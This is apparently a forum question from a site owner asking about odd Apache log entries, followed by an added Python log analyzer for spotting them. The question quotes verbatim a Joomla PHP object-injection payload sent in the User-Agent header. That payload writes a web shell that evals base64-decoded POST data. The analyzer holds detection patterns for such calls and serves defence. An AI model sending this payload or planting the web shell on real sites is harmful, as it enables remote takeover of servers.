The Apache access log entries on my website usually look like this:
207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 0.607 MISS 10.10.36.125:104 0.607
So you can see the "user-agent" field there. But today I also found the user-agent field being used like this:
62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-" "}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:242:"file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."sqlconfigbak.php","|=|\x3C".chr(63)."php \x24mujj=\x24_POST['z'];if(\x24mujj!=''){\x24xsser=base64_decode(\x24_POST['z0']);@eval(\"\\\x24safedg=\x24xsser;\");}");JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}~Ů" 0.304 BYPASS 10.10.36.125:104 0.304
Is this an attack? The next log entry seems to have successfully retrieved the sqlconfigbak.php file mentioned in the script (code 200), although I cannot find that file anywhere in the filesystem:
62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 "http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0.244 BYPASS 10.10.36.125:104 0.244
What is going on here?
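An added example (not part of the question or of any answer to it): a small Python log analyzer that does what a defender would do with lines like the ones above. It parses the asker's log format, flags any User-Agent value that carries a serialized PHP object (the O:<len>:"ClassName" header, the \0\0\0 protected-property prefix, or PHP calls such as file_put_contents/eval), and then checks whether any later request fetched a .php file named inside that payload, reporting its status code and the cache field. The field order of the four trailing columns is assumed from the sample lines, the indicator patterns are my own heuristics, and the sample log lines are constructed (the payload line is a shortened stand-in for the one in the question, not the real payload).

```python
import re

# Log format as shown in the question: Apache "combined" fields followed by four
# extra columns. Their meaning is assumed (upstream time, cache status, upstream
# address, request time); only their count and order is taken from the samples.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>.*)" '
    r'(?P<upstream_time>\S+) (?P<cache>\S+) (?P<upstream>\S+) (?P<req_time>\S+)$'
)

# Serialized PHP object header: O:<len>:"<ClassName>":<propcount>:{
PHP_OBJECT_RE = re.compile(r'O:\d+:"[A-Za-z_\\][A-Za-z0-9_\\]*":\d+:\{')
# Three NUL bytes (logged as \0\0\0) prefix protected/private property names in
# serialized PHP objects; no browser puts these in a User-Agent.
PROTECTED_PROP_RE = re.compile(r'(\\0){3}|\x00{3}')
# PHP calls with no legitimate reason to appear in a User-Agent value.
SUSPICIOUS_CALLS = ("eval(", "assert", "file_put_contents(", "base64_decode(", "system(")
# File names a payload refers to, used to correlate later requests for them.
PHP_FILE_RE = re.compile(r'([A-Za-z0-9_.-]+\.php)')


def parse_line(line):
    """Split one access-log line into named fields; None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def user_agent_indicators(ua):
    """Names of PHP object-injection indicators present in a User-Agent value."""
    found = []
    if PHP_OBJECT_RE.search(ua):
        found.append("php_serialized_object")
    if PROTECTED_PROP_RE.search(ua):
        found.append("protected_property_marker")
    if any(call in ua for call in SUSPICIOUS_CALLS):
        found.append("suspicious_php_call")
    return found


def analyze(lines):
    """Flag entries whose User-Agent carries a serialized PHP object and list every
    later request for a .php file named inside that payload (with status and cache
    result), so the reader can judge whether the attempted file write landed."""
    entries = [e for e in (parse_line(l) for l in lines) if e]
    findings = []
    for i, entry in enumerate(entries):
        indicators = user_agent_indicators(entry["ua"])
        if not indicators:
            continue
        referenced = set(PHP_FILE_RE.findall(entry["ua"]))
        followups = []
        for later in entries[i + 1:]:
            parts = later["request"].split()
            path = parts[1] if len(parts) >= 2 else ""
            if any(path.lstrip("/").endswith(name) for name in referenced):
                followups.append((later["ip"], path, later["status"], later["cache"]))
        findings.append({
            "ip": entry["ip"],
            "ts": entry["ts"],
            "indicators": indicators,
            "referenced_files": sorted(referenced),
            "followups": followups,
        })
    return findings


# Constructed sample log, modelled on the question's lines. The second line's
# User-Agent is a deliberately shortened stand-in, not the original payload.
SAMPLE_LOG = [
    r'207.46.13.174 - - [31/Oct/2016:10:18:55 +0100] "GET /contact HTTP/1.1" 200 256 "-" '
    r'"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" '
    r'0.607 MISS 10.10.36.125:104 0.607',
    r'62.210.162.42 - - [31/Oct/2016:11:24:19 +0100] "GET / HTTP/1.1" 200 399 "-" '
    r'"}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}'
    r's:21:"\0\0\0disconnectHandlers";s:8:"feed_url";s:50:"file_put_contents("sqlconfigbak.php","...");exit;";}" '
    r'0.304 BYPASS 10.10.36.125:104 0.304',
    r'62.210.162.42 - - [31/Oct/2016:11:24:20 +0100] "GET //sqlconfigbak.php HTTP/1.1" 200 399 '
    r'"http://www.googlebot.com/bot.html" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" '
    r'0.244 BYPASS 10.10.36.125:104 0.244',
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the benign bingbot line produces no indicators, the payload line is flagged on all three heuristics, and the follow-up GET for //sqlconfigbak.php is reported with its 200 status and BYPASS cache field. That follow-up is exactly the line worth checking in the web server's own log and on disk: a 200 with a small byte count for a file that does not exist in the document root is worth comparing against the upstream server's log rather than trusting the front-end entry alone.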